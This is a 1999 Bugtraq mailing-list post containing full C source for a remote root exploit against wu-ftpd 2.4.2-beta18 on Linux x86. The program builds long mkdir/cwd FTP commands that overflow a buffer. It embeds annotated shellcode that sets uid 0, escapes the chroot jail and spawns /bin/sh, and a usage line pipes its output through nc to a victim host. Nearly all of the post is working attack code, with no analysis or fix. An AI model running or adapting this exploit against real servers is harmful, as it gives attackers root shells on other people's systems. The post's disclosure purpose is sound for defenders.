[9983] in bugtraq
another ftp exploit
daemon@ATHENA.MIT.EDU (Pieter Nieuwenhuijsen)
Fri Mar 26 01:56:28 1999
Date: Thu, 25 Mar 1999 15:42:47 +0100
Reply-To: Pieter Nieuwenhuijsen <pietern@XS4ALL.NL>
From: Pieter Nieuwenhuijsen <pietern@XS4ALL.NL>
To: BUGTRAQ@NETSPACE.ORG
/*
wu-ftpd mkdir v2.4.2-beta18 remote rewt spl01t v1.20 ( linux x86 )
by joey__ <youcan_reachme@hotmail.com> of rhino9 <http://www.rhino9.com> - 2/20/99
big thx horizon, duke, nimrood and icee
sh0utz neonsurge, xaphan, joc, sri, aalawaka, and aakanksha
USAGE:
( ./wh0a [ initialdir ] [ <username> <password> ] [ <offset> <code address> ] ; cat ) | nc <victimname> <victimport>
*/
#include <stdio.h>
char x86_shellcode0[156] =
"\x83\xec\x04" /* sub esp,4 */
/* esi -> local variables and data */
"\x5e" /* pop esi */
"\x83\xc6\x70" /* add esi,0x70 */
"\x83\xc6\x20" /* add esi,0x20 */
"\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */
/* decode the strings */
"\x31\xc9" /* xor ecx, ecx */
"\xb1\x30" /* mov cl,0x30 */
"\x80\x2b\x32" /* sub byte ptr [ebx],0x32 */
"\x43" /* inc ebx */
"\x49" /* dec ecx */
"\x75\xf9" /* jnz short decode_next_byte */
"\x31\xc0" /* xor eax,eax */
/* setuid ( 0 ) */
"\x89\xc3" /* mov ebx,eax */
"\xb0\x17" /* mov al,0x17 */
"\xcd\x80" /* int 0x80 */
"\x31\xc0" /* xor eax,eax */
/* setgid ( 0 ) */
"\x89\xc3" /* mov ebx,eax */
"\xb0\x2e" /* mov al,0x2e */
"\xcd\x80" /* int 0x80 */
/* To break chroot we have to...
fd = open ( ".", O_RDONLY );
mkdir ( "hax0r", 0666 );
chroot ( "hax0r" );
fchdir ( fd );
for ( i = 0; i < 254; i++ )
chdir ( ".." );
chroot ( "." );
*/
"\x31\xc0" /* xor eax,eax */
/* var0 = open ( ".", O_RDONLY ) */
"\x31\xc9" /* xor ecx,ecx */
"\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */
"\xb0\x05" /* mov al,0x05 */
"\xcd\x80" /* int 0x80 */
"\x89\x06" /* mov [esi],eax */
"\x31\xc0" /* xor eax,eax */
/* mkdir ( "hax0r", 0666 ) */
"\x8d\x5e\x11" /* lea ebx,[esi+0x11] */
"\x8b\x4e\x1f" /* mov ecx,[esi+0x1f] */
"\xb0\x27" /* mov al,0x27 */
"\xcd\x80" /* int 0x80 */
"\x31\xc0" /* xor eax,eax */
/* chroot ( "hax0r" ) */
"\x8d\x5e\x11" /* lea ebx,[esi+0x11] */
"\xb0\x3d" /* mov al,0x3d */
"\xcd\x80" /* int 0x80 */
"\x31\xc0" /* xor eax,eax */
/* fchdir ( fd ) */
"\x8b\x1e" /* mov ebx,[esi] */
"\xb0\x85" /* mov al,0x85 */
"\xcd\x80" /* int 0x80 */
"\x31\xc9" /* xor ecx, ecx */
/* for ( i = 0; i < 254; i++ ) { */
"\xb1\xfe" /* mov cl,0xfe */
"\x31\xc0" /* xor eax,eax */
/* chdir ( ".." ) */
"\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */
"\xb0\x0c" /* mov al,0x0c */
"\xcd\x80" /* int 0x80 */
"\x49" /* dec ecx */
/* } */
"\x75\xf4" /* jnz short goto_parent_dir */
"\x31\xc0" /* xor eax,eax */
/* chroot ( "." ) */
"\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */
"\xb0\x3d" /* mov al,0x3d */
"\xcd\x80" /* int 0x80 */
"\x31\xc0" /* xor eax,eax */
/* execve ( "/bin/sh", "xxxxx", NULL ) */
"\x8d\x5e\x17" /* lea ebx,[esi+0x17] */
"\x8d\x4e\x04" /* lea ecx,[esi+0x04] */
"\x8d\x56\x08" /* lea edx,[esi+0x08] */
"\x89\x19" /* mov [ecx],ebx */
"\x89\x02" /* mov [edx],eax */
"\xb0\x0b" /* mov al, 0x0b */
"\xcd\x80" /* int 0x80 */
"\x31\xdb" /* xor ebx,ebx */
/* exit ( 0 ) */
"\x89\xd8" /* mov eax,ebx */
"\x40" /* inc eax */
"\xcd\x80" /* int 0x80 */
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"var0"
/* local variable integer */
"cmd0"
/* char *cmd[2] */
"cmd1";
char x86_shellcode1[1024] =
".."
"\x00"
"."
"\x00"
"hax0r"
"\x00"
"/bin/sh"
"\x00"
"\xb6\x01\x00\x00";
char vardir[300];
int varlen;
main ( int argc, char **argv )
{
char *username, *password, *initialdir;
int bufoffset, codeaddr, i, j, *pcodeaddr;
if ( argc > 1 )
initialdir = argv[1];
else initialdir = "/incoming";
if ( argc > 3 )
{
username = argv[2];
password = argv[3];
}
else
{
username = "anonymous";
password = "poon@ni.com";
}
if ( argc > 5 )
{
bufoffset = atoi ( argv[4] );
codeaddr = atoi ( argv[5] );
}
else
{
bufoffset = 195;
codeaddr = 0x0805ac81;
}
printf ( "user %s\n", username );
printf ( "pass %s\n", password );
printf ( "cwd %s\n", initialdir );
varlen = bufoffset - strlen ( initialdir );
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );
varlen = 210;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );
varlen = 210;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );
varlen = 170;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );
varlen = 250;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
for ( i = 0; i < sizeof ( x86_shellcode0 ); i++ )
vardir[i] = x86_shellcode0[i];
j = 0;
for ( i = sizeof ( x86_shellcode0 ); j < 32; i++ )
{
vardir[i] = ( char ) ( x86_shellcode1[j++] + 0x32 );
}
pcodeaddr = ( int * ) &( vardir[varlen] );
*pcodeaddr = codeaddr;
vardir[varlen+4] = 0;
printf ( "mkd %s\n", vardir );
}
